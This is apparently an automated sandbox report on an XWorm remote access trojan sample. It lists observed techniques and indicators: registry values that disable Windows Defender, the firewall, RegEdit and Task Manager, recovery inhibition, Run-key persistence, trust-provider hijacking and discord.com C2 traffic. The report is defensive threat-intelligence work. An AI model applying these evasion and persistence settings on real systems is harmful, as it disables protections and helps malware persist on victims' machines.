xworm | 9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4100	bcdedit.exe
3420	bcdedit.exe
3600	bcdedit.exe
396	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5600	powershell.exe
4544	powershell.exe
1252	powershell.exe
3788	powershell.exe
1960	powershell.exe
5808	powershell.exe
1696	powershell.exe
1860	powershell.exe
4920	powershell.exe
3756	powershell.exe
3168	Process not Found
1372	powershell.exe
3848	powershell.exe
5836	powershell.exe
5572	powershell.exe
1444	powershell.exe
1968	powershell.exe
5928	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Manipulates Digital Signatures 1 TTPs 15 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
6044	netsh.exe
2364	netsh.exe

Possible privilege escalation attempt 32 IoCs

exploit

pid	Process
6056	takeown.exe
1920	icacls.exe
5240	takeown.exe
4880	icacls.exe
5728	takeown.exe
1108	takeown.exe
5836	takeown.exe
3860	icacls.exe
2692	icacls.exe
1076	takeown.exe
5692	icacls.exe
2196	icacls.exe
3560	takeown.exe
1392	icacls.exe
4668	takeown.exe
4712	icacls.exe
4236	icacls.exe
580	takeown.exe
4460	takeown.exe
3224	takeown.exe
2740	takeown.exe
5916	takeown.exe
2212	takeown.exe
916	takeown.exe
3860	icacls.exe
768	icacls.exe
296	takeown.exe
1700	takeown.exe
2824	takeown.exe
1520	icacls.exe
1072	icacls.exe
5440	icacls.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
4744	attrib.exe
1384	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe

Executes dropped EXE 4 IoCs

pid	Process
1040	Rasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
2052	$77RealtekAudioDriverHost.exe
6532	Windows Host Service.scr

Modifies file permissions 1 TTPs 32 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6056	takeown.exe
4880	icacls.exe
2692	icacls.exe
5440	icacls.exe
3560	takeown.exe
5836	takeown.exe
1072	icacls.exe
4668	takeown.exe
3860	icacls.exe
2824	takeown.exe
768	icacls.exe
4460	takeown.exe
3224	takeown.exe
2740	takeown.exe
1108	takeown.exe
5728	takeown.exe
1520	icacls.exe
1920	icacls.exe
3860	icacls.exe
5240	takeown.exe
2196	icacls.exe
1392	icacls.exe
4236	icacls.exe
2212	takeown.exe
1076	takeown.exe
5692	icacls.exe
296	takeown.exe
1700	takeown.exe
5916	takeown.exe
580	takeown.exe
4712	icacls.exe
916	takeown.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\""	sRasauq SoftWorks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr"	Rasauq SoftWorks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	discord.com
92	discord.com
1219	discord.com

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1204	powercfg.exe
2272	powercfg.exe
1972	powercfg.exe
5728	powercfg.exe
4240	powercfg.exe
5544	powercfg.exe
3832	powercfg.exe
484	powercfg.exe
5884	powercfg.exe
1748	powercfg.exe
5424	powercfg.exe
3220	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File created	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4680	sc.exe
5436	sc.exe
2832	sc.exe
5228	sc.exe
1888	sc.exe
1860	sc.exe
3180	sc.exe
1028	sc.exe
2072	sc.exe
3840	sc.exe
5476	sc.exe
2280	sc.exe
4656	sc.exe
5704	sc.exe
580	sc.exe
2708	sc.exe
236	sc.exe
2324	sc.exe
2832	sc.exe
2008	sc.exe
4400	sc.exe
5752	sc.exe
1368	sc.exe
4520	sc.exe
4104	sc.exe
2380	sc.exe
948	sc.exe
4692	sc.exe
3752	sc.exe
856	sc.exe
1492	sc.exe
4756	sc.exe
3764	sc.exe
4304	sc.exe
3148	sc.exe
1016	sc.exe
2780	sc.exe
2184	sc.exe
2324	sc.exe
4428	sc.exe
5828	sc.exe
728	sc.exe
3092	sc.exe
336	sc.exe
4284	sc.exe
1676	sc.exe
2664	sc.exe
1656	sc.exe
1616	sc.exe
4452	sc.exe
236	sc.exe
3648	sc.exe
1704	sc.exe
4772	sc.exe
3808	sc.exe
4104	sc.exe
5736	sc.exe
3784	sc.exe
2128	sc.exe
4664	sc.exe
5144	sc.exe
780	sc.exe
5076	sc.exe
3920	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
